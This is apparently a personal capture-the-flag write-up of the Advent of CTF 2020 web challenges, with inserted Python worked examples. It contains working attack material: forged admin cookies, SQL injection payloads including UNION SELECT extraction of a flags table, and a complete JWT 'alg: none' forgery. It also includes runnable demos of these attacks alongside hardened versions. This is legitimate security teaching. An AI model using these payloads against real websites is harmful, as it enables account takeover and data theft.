Advent of CTF (December 2020)

This CTF was developed by a Dutch tech school called NOVI Hogeschool. Every day a new challenge will be released. It looks like they will get progressively more difficult.

I probably will not get through all of them since I have the SANS Holiday Hack and also THM Advent of Cyber 2 going on at the same time.

When you browse to that address you will see this:

Looks like we need to find Santa’s password. If you check the source code you will see an “odd encoded thing”:

This is Base64:

Alright, let’s try this as Santa’s password:

There are also cool badges for every challenge you solve. Here is Badge 1:

This challenge takes you to a login page:

First, I tried “username” and “password” to see what would happen:

From here, if you check out the cookies you will see this:

eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D

What I did was decode this (Base64):

I changed “guest” to “false” and “admin” to “true”, and then encoded it back into Base64:

I inserted that new code into the cookie value spot, hit enter, and then refreshed the page:
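The Day 2 cookie round-trip as an added worked example (my code, not the writeup's). The point it makes explicit is the `%3D` at the end of the cookie: that is the URL encoding of the Base64 `=` padding, so the value has to be URL-decoded before it is Base64-decoded, and re-encoded in the opposite order on the way back. The function names are mine; the cookie's name is not shown on the page, so only its value is used.

```python
import base64
import json
from urllib.parse import quote, unquote

# Cookie value copied from the writeup (Day 2); the cookie's name is not shown there.
ORIGINAL_COOKIE = "eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D"


def decode_cookie(value: str) -> dict:
    """URL-decode, then Base64-decode, then parse the JSON the cookie carries."""
    # "%3D" is the URL encoding of "=", the Base64 padding character
    raw = base64.b64decode(unquote(value))
    return json.loads(raw)


def encode_cookie(flags: dict) -> str:
    """Inverse of decode_cookie: compact JSON -> Base64 -> URL-encode."""
    raw = json.dumps(flags, separators=(",", ":")).encode()
    # safe="" so the "=" padding comes out as "%3D", matching what the browser showed
    return quote(base64.b64encode(raw).decode(), safe="")


def forge_admin_cookie(value: str) -> str:
    """Flip the two string 'booleans' the way the writeup does and re-encode."""
    flags = decode_cookie(value)
    flags["guest"] = "false"
    flags["admin"] = "true"
    return encode_cookie(flags)


if __name__ == "__main__":
    print("original  :", decode_cookie(ORIGINAL_COOKIE))
    forged = forge_admin_cookie(ORIGINAL_COOKIE)
    print("forged    :", forged)
    print("round-trip:", decode_cookie(forged))
```

The forged value is what gets pasted into the cookie editor in place of the original; decoding it again is a quick sanity check that the padding and URL encoding survived.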

Another login to infiltrate:

If you try to put in a test username, nothing happens at all. Looking through the source code, I see that it calls a function named checkPass():

So apparently if I add -NOVI to the end of my password, it will work. Also notice the btoa() call: btoa() is the browser's Base64 encoder, so the value being compared has to be Base64-encoded.

The username I chose is “AlienMoo”, so I need to have “AlienMoo-NOVI” encoded to Base64 as my password:

Looks like it worked!

Day 4, and another web challenge. Here is what you will see when you open the link:

After looking around, you can see that the webpage uses JavaScript to create a token (login.js):

This all looks quite confusing, but if you work through the check function, you can piece together what is going on.

The key I currently have is eyJ1c2VyaWQiOjB9.1074

I need to change that to something different to gain access. It is split into two pieces at the period. The first part (eyJ1c2VyaWQiOjB9) is Base64 and decodes to {"userid":0}; the second part (1074) is the result of the calculations in the check function.

Here is a script that reverses things:

Changing the user ID methodically will reveal different results that can be tested.

Luckily, the first iteration, User 1, worked.

This times out VERY quickly, so you need to hurry and copy the flag:

Day 5! Another login form.

Having just done a SQL Injection challenge today over at TryHackMe for their Christmas challenge, I decided to try the same thing again. I assumed the username was admin:

After submitting it, I got the following error:

Error description: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin'' at line 1

At this point I thought about using SqlMap since it says we are allowed to use a “tool”, but then in the rules it specifically says you can’t use SqlMap, so I kept doing it by hand. I tried a few more variations and eventually ended up with this:

Here is our next web challenge for today:

It took me much longer than I’d like to admit to realize that I should be searching for “flag”:

So this pulls something up, a table with three columns, but only the first 5 characters are shown for legal reasons.

I started trying some SQL Injection again:

I am going to try to show the contents of each column using this command:

' UNION SELECT table_name, 2, 3 FROM information_schema.tables #

Nice, that worked. Look down at the bottom:

Now we can try to show the “flags” table:

' UNION SELECT (SELECT * FROM flags), 2, 3 #
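The Day 5 login and the search form above, as an added worked example that is not part of the original writeup. It rebuilds a login query and a three-column search query with string concatenation, runs the kind of payloads the page uses against them, and then shows the parameterized versions that turn the same payloads into harmless literals. The database is a constructed in-memory SQLite stand-in (table and column names are invented for the example), so two details differ from the challenge's MariaDB: table metadata comes from sqlite_master instead of information_schema.tables, and the trailing comment is `-- ` instead of `#`. One caveat on the page's own payload: a scalar subquery like `(SELECT * FROM flags)` only works in MariaDB when `flags` has exactly one column and one row; selecting the column by name, as below, has no such restriction.

```python
import sqlite3

# Constructed stand-in for the challenge's MariaDB database. SQLite is used so the
# example runs offline; the techniques are the same, but table metadata lives in
# sqlite_master rather than information_schema, and the comment is "-- " not "#".
SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery-staple');
CREATE TABLE presents (id INTEGER, name TEXT, recipient TEXT);
INSERT INTO presents VALUES (1, 'flag holder', 'Santa'), (2, 'mice', 'Elf');
CREATE TABLE flags (id INTEGER, flag TEXT);
INSERT INTO flags VALUES (1, 'NOVI{constructed_example_flag}');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- how the challenge apps were presumably written: string concatenation ---

def login_vulnerable(conn, username, password):
    """Day 5 style login: returns the matched username or None."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, term):
    """Day 6 style search: three columns come back, like the challenge table."""
    query = f"SELECT id, name, recipient FROM presents WHERE name LIKE '%{term}%'"
    return conn.execute(query).fetchall()


# --- hardened forms: the same queries with bound parameters ---

def login_safe(conn, username, password):
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def search_safe(conn, term):
    return conn.execute(
        "SELECT id, name, recipient FROM presents WHERE name LIKE ?",
        (f"%{term}%",)).fetchall()


def demo():
    conn = make_db()
    results = {}
    # A lone quote breaks the statement: the "syntax ... near 'admin''" error from Day 5
    try:
        login_vulnerable(conn, "admin'", "x")
    except sqlite3.OperationalError as exc:
        results["syntax_error"] = str(exc)
    # Comment out the password check entirely
    results["bypass"] = login_vulnerable(conn, "admin' -- ", "wrong")
    # Enumerate tables; the UNION must supply the same number of columns (3)
    rows = search_vulnerable(
        conn, "' UNION SELECT name, 2, 3 FROM sqlite_master WHERE type = 'table' -- ")
    results["tables"] = sorted(r[0] for r in rows if r[1] == 2)
    # Pull the flag column by name instead of a scalar subquery
    rows = search_vulnerable(conn, "' UNION SELECT flag, 2, 3 FROM flags -- ")
    results["flag"] = [r[0] for r in rows if r[1] == 2]
    # The same payloads against the parameterized queries are just literal strings
    results["safe_bypass"] = login_safe(conn, "admin' -- ", "wrong")
    results["safe_search"] = search_safe(conn, "' UNION SELECT flag, 2, 3 FROM flags -- ")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `2, 3` placeholders in the UNION payloads exist only to match the column count of the original SELECT; the filter on `r[1] == 2` in `demo()` picks out the injected rows from the genuine search results.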

I appreciated these last two SQL challenges since I am trying to improve this area of my education.

Still working with the web theme, here we have what appears to be another database challenge. I tried to search for “mice” and just got “Why?” returned to me:

Any other plain text word I tried had the same result. I’m thinking it’s another SQL challenge. Not my favorite, but I do need the practice.

I was gearing up for some intense morning Googling, but this one actually turned out to be quite simple:

Hmm, robots? I headed straight to /robots.txt to see if there were any hints there:

At /encryption/is/a/right I found this:

This is Base64:

At /fnagn/unf/znal/cynprf/gb/tb I found this:

From here I assume you have to decode the directory name. It turned out to be ROT13 (/fnagn/unf/znal/cynprf/gb/tb decodes to /santa/has/many/places/to/go):

From here you have to infiltrate the forum as admin:

I tried user:admin and password:password, and got this back:

I used Burp to intercept my next attempt:

I sent this request to the intruder to attempt an attack, but then I remembered there was a rule against brute forcing and tried to find another way.

Eventually, after looking at the message “Hey user, your password is incorrect”, I decided to try user:user password:incorrect.

That returned something a bit different, telling me that the Naughty List was currently empty.

Now that I’m actually in an account, I can do a little exploring. The cookie seems to hold the key:

It can be decoded with Base64.

If you look at the little “JWT”, you can see that this is a JSON Web Token. There are some well-known vulnerabilities in how these tokens get verified that you can read about.

If I change the role of “user” to “admin”, I should have some more permissions.

The first thing to do is change the header, {"typ":"JWT","alg":"HS256"}. I'm going to set the algorithm to "none", which tells a verifier that the token carries no signature; a library that honours the algorithm named in the header will skip the signature check entirely.

{"typ":"JWT","alg":"none"}

Then I need to add on the second part of the token.

{"auth":28961,"text":"I do love a good puzzle.","role":"admin","iat":1607717857}

Then Base64url-encode both parts, strip the "=" padding, and join them with a period. The signature segment is left empty, which is why the forged token ends with a trailing period:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoyODk2MSwidGV4dCI6IkkgZG8gbG92ZSBhIGdvb2QgcHV6emxlLiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYwNzcxNzg1N30.

Paste this into the cookie section and then reload the page.
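The forgery above as an added worked example, not code from the original writeup. The page does not show the original signed cookie, so the block first mints an HS256 token over the same claims with `role` set to `user` under a constructed key (the key and all function names are assumptions), then produces the `alg: none` token the page pastes into the cookie, and finally shows why the trick works: a verifier that trusts the `alg` field from the token's own header accepts the forged token, while one that pins the expected algorithm rejects it.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example: the challenge's real signing key is unknown.
DEMO_KEY = b"constructed-demo-key"

# Claims shown in the writeup, with the role still "user" (the pre-tampering state).
ORIGINAL_CLAIMS = {"auth": 28961, "text": "I do love a good puzzle.",
                   "role": "user", "iat": 1607717857}


def b64url_encode(raw: bytes) -> str:
    # JWT segments are URL-safe Base64 with the "=" padding removed
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    # Put the padding back so the stdlib decoder accepts it
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    # Compact JSON (no spaces), the form JWT libraries emit
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token: str):
    """Split header.payload.signature and decode each part; no verification here."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)),
            b64url_decode(sig_b64))


def hs256(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def make_hs256_token(claims: dict, key: bytes) -> str:
    """Mint a properly signed token, standing in for the cookie the site issued."""
    header = {"typ": "JWT", "alg": "HS256"}
    signing_input = encode_segment(header) + "." + encode_segment(claims)
    return signing_input + "." + b64url_encode(hs256(signing_input, key))


def forge_alg_none(token: str, **changes) -> str:
    """Rewrite alg to 'none', change claims, and leave the signature segment empty."""
    header, payload, _ = decode_jwt(token)
    header["alg"] = "none"
    payload.update(changes)
    return encode_segment(header) + "." + encode_segment(payload) + "."


def verify_trusting_header(token: str, key: bytes):
    """Vulnerable verifier: does whatever the token's own header says."""
    header, payload, sig = decode_jwt(token)
    signing_input = token.rsplit(".", 1)[0]
    alg = header.get("alg")
    if alg == "none":            # unsigned tokens accepted as-is
        return payload
    if alg == "HS256" and hmac.compare_digest(hs256(signing_input, key), sig):
        return payload
    return None


def verify_pinned(token: str, key: bytes):
    """Hardened verifier: the server decides the algorithm, not the token."""
    header, payload, sig = decode_jwt(token)
    if header.get("alg") != "HS256":
        return None
    signing_input = token.rsplit(".", 1)[0]
    return payload if hmac.compare_digest(hs256(signing_input, key), sig) else None


if __name__ == "__main__":
    issued = make_hs256_token(ORIGINAL_CLAIMS, DEMO_KEY)
    forged = forge_alg_none(issued, role="admin")
    print("forged:", forged)
    print("trusting verifier sees role:", verify_trusting_header(forged, DEMO_KEY)["role"])
    print("pinned verifier result:", verify_pinned(forged, DEMO_KEY))
```

The forged string printed by the block is exactly the token shown above, because the header and payload segments do not depend on the key at all; only the now-empty third segment did. That is the whole weakness: if the server lets the token choose its algorithm, the signature becomes optional.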

And that’s as far as I got this year. I really did value the opportunity to work on my SQL Injection, despite the fact that I grumbled to myself the entire way through them.

Happy Hacking! ❤
